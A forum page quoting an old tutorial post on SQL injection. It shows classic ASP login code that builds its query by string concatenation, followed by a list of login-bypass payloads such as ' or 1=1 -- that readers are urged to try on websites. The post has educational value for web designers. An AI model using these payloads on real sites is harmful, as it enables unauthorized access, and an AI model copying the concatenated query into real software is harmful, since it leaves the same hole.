Search
Search titles only
By:
Search titles only
By:
Log in
Register
Search
Search titles only
By:
Search titles only
By:
Menu
Install the app
Install
Forums
New posts
All threads
Latest threads
New posts
Trending threads
Trending
Search forums
What's new
New posts
New ads
New profile posts
Latest activity
Free Ads
Latest reviews
Search ads
Members
Current visitors
New profile posts
Search profile posts
Contact us
Latest ads
Pure VPN - Up to 27 Months
vgp
Updated:
Friday at 8:10 AM
එක පැකේජ් එකයි මාසෙටම Unlimited Internet. තාමත් DATA CARD දාන්න සල්ලි වියදම් කරනවද? අඩුම මිලට අපෙන්.
sayuru bandara
Updated:
Tuesday at 12:30 PM
Ad icon
ඉන්ටර්නෙට් එකෙන් හරියටම සල්ලි හොයන්න සහ Success වෙන්න කැමතිද? 🚀 (E-Money & Success Stories)
siri sumana
Updated:
May 30, 2026
Gemini AI PRO 18 months Offer
Hawaka
Updated:
May 27, 2026
Ad icon
koko account
DasunEranga
Updated:
May 27, 2026
Electronics
Vehicles
Property
Search
Reply to thread
Forums
Computers & Internet
Software Development
SQL Injection [Part I]
Get the App
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Message
<blockquote data-quote="yms" data-source="post: 2997357" data-attributes="member: 4237"><p>Part I – Using HTTP port 80 ( Or better would be malformed URLs)</p><p>----------------------------------------------------------------</p><p></p><p>This part will be useful not only to the hackers but also to the web designers. A common mistake made by the web designers can reveal the databases of the server to the hacker. Lets see on it. The whole game is of query strings. So it is assumed that the reader has some knowledge about queries and asp. And one more thing. This hack is done using only through the browser. So you even don't require any other tools except IE or Netscape.</p><p>Normally, inorder to make a login page, the web designer will write the following code.</p><p></p><p>login.htm</p><p></p><p><html></p><p><body></p><p><form method=get action="logincheck.asp"></p><p><input type="text" name="login_name"></p><p><input type="text" name="pass"></p><p><input type="submit" value="sign in"></p><p></form></p><p></body></p><p></html></p><p></p><p>logincheck.asp</p><p></p><p><@language="vbscript"></p><p><%</p><p>dim conn,rs,log,pwd</p><p>log=Request.form("login_name")</p><p>pwd=Request.form("pass")</p><p></p><p>set conn = Server.CreateObject("ADODB.Connection")</p><p>conn.ConnectionString="provider=microsoft.jet.OLEDB.4.0;data source=c:\folder\multiplex.mdb"</p><p>conn.Open</p><p>set rs = Server.CreateObject("ADODB.Recordset")</p><p>rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "' ",conn</p><p>If rs.EOF</p><p> response.write("Login failed")</p><p>else</p><p> response.write("Login successful")</p><p>End if</p><p>%></p><p></p><p>Looking at the above code at first site it seems OK. A user will type his login name and password in login.htm page and click the submit button. The value of the text boxes will be passed to the logincheck.asp page where it will be checked using the query string. If it doesn't get an entry satisfying the query and will reach end of file a message of login failed will be displayed. Every thing seems to be OK. But wait a minute. Think again. Is every thing really OK ?!! What about the query ?!! Is it OK. Well if you have made a page like this then a hacker can easily login successfully without knowing the password. How ? Lets look at the querry again.</p><p></p><p>"Select * from table1 where login='"&log& "' and password='" &pwd& "' "</p><p></p><p>Now if a user types his login name as "r0ot-hAcK" and password as "h4x3r" then these values will pass to the asp page with post method and then the above query will become</p><p></p><p>"Select * from table1 where login=' r0ot-hAcK ' and password=' h4x3r ' "</p><p></p><p>Thats fine. There will be an entry r0ot-hAcK and h4x3r in login and password fields in the database so we will receive a message as login successful. Now what if I type loginname as "r0ot-hAcK" and password as</p><p>hi' or 'a'='a in the password text box ? The query will become as follows:</p><p></p><p>"Select * from table1 where login=' r0ot-hAcK ' and password=' hi' or 'a'='a ' "</p><p></p><p>And submit and bingo!!!!! I will get the message as Login successful !! Did you see the smartness of hacker which was due to carelessness of web designer ? !!</p><p>The query gets satisfied as query changes and password needs to 'hi' or 'a' needs to be equal to 'a'. Clearly password is not 'hi' but at the same time 'a'='a' . So condition is satisfied. And a hacker is in with login "r0ot-hAcK" !! You can try the following in the password text box if the above doesn't work for some websites:</p><p></p><p>hi" or "a"="a</p><p>hi" or 1=1 --</p><p>hi' or 1=1 --</p><p>hi' or 'a'='a</p><p>hi') or ('a'='a</p><p>hi") or ("a"="a</p><p></p><p>Here above -- will make the rest of the query string to be a comment other conditions will not be checked. Similary you can provide</p><p></p><p>r0ot-hAcK ' --</p><p>r0ot-hAcK " --</p><p></p><p>or such types of other possibilites in the login name textbox and password as anything which might let you in. Because in the query string only login name is checked as "r0ot-hAcK" and rest is ignored due to --. Well if you are lucky enough you get such a website were the webdesigner has done the above mistake and then you will be able to login as any user !!!</p><p></p><p>Part II vl cming soooooooooooooooooooon......<img src="/styles/default/xenforo/smilies/default/D.gif" class="smilie" loading="lazy" alt=":D" title="Big grin :D" data-shortname=":D" /> KIT</p></blockquote><p></p>
[QUOTE="yms, post: 2997357, member: 4237"] Part I – Using HTTP port 80 ( Or better would be malformed URLs) ---------------------------------------------------------------- This part will be useful not only to the hackers but also to the web designers. A common mistake made by the web designers can reveal the databases of the server to the hacker. Lets see on it. The whole game is of query strings. So it is assumed that the reader has some knowledge about queries and asp. And one more thing. This hack is done using only through the browser. So you even don't require any other tools except IE or Netscape. Normally, inorder to make a login page, the web designer will write the following code. login.htm <html> <body> <form method=get action="logincheck.asp"> <input type="text" name="login_name"> <input type="text" name="pass"> <input type="submit" value="sign in"> </form> </body> </html> logincheck.asp <@language="vbscript"> <% dim conn,rs,log,pwd log=Request.form("login_name") pwd=Request.form("pass") set conn = Server.CreateObject("ADODB.Connection") conn.ConnectionString="provider=microsoft.jet.OLEDB.4.0;data source=c:\folder\multiplex.mdb" conn.Open set rs = Server.CreateObject("ADODB.Recordset") rs.open "Select * from table1 where login='"&log& "' and password='" &pwd& "' ",conn If rs.EOF response.write("Login failed") else response.write("Login successful") End if %> Looking at the above code at first site it seems OK. A user will type his login name and password in login.htm page and click the submit button. The value of the text boxes will be passed to the logincheck.asp page where it will be checked using the query string. If it doesn't get an entry satisfying the query and will reach end of file a message of login failed will be displayed. Every thing seems to be OK. But wait a minute. Think again. Is every thing really OK ?!! What about the query ?!! Is it OK. Well if you have made a page like this then a hacker can easily login successfully without knowing the password. How ? Lets look at the querry again. "Select * from table1 where login='"&log& "' and password='" &pwd& "' " Now if a user types his login name as "r0ot-hAcK" and password as "h4x3r" then these values will pass to the asp page with post method and then the above query will become "Select * from table1 where login=' r0ot-hAcK ' and password=' h4x3r ' " Thats fine. There will be an entry r0ot-hAcK and h4x3r in login and password fields in the database so we will receive a message as login successful. Now what if I type loginname as "r0ot-hAcK" and password as hi' or 'a'='a in the password text box ? The query will become as follows: "Select * from table1 where login=' r0ot-hAcK ' and password=' hi' or 'a'='a ' " And submit and bingo!!!!! I will get the message as Login successful !! Did you see the smartness of hacker which was due to carelessness of web designer ? !! The query gets satisfied as query changes and password needs to 'hi' or 'a' needs to be equal to 'a'. Clearly password is not 'hi' but at the same time 'a'='a' . So condition is satisfied. And a hacker is in with login "r0ot-hAcK" !! You can try the following in the password text box if the above doesn't work for some websites: hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a Here above -- will make the rest of the query string to be a comment other conditions will not be checked. Similary you can provide r0ot-hAcK ' -- r0ot-hAcK " -- or such types of other possibilites in the login name textbox and password as anything which might let you in. Because in the query string only login name is checked as "r0ot-hAcK" and rest is ignored due to --. Well if you are lucky enough you get such a website were the webdesigner has done the above mistake and then you will be able to login as any user !!! Part II vl cming soooooooooooooooooooon......:D KIT [/QUOTE]
Insert quotes…
Verification
Hath warak paha keeyada? (hatha wadikireema paha)
Post reply
Top
Bottom
Pure VPN - Up to 27 Months
Gemini AI PRO 18 months Offer
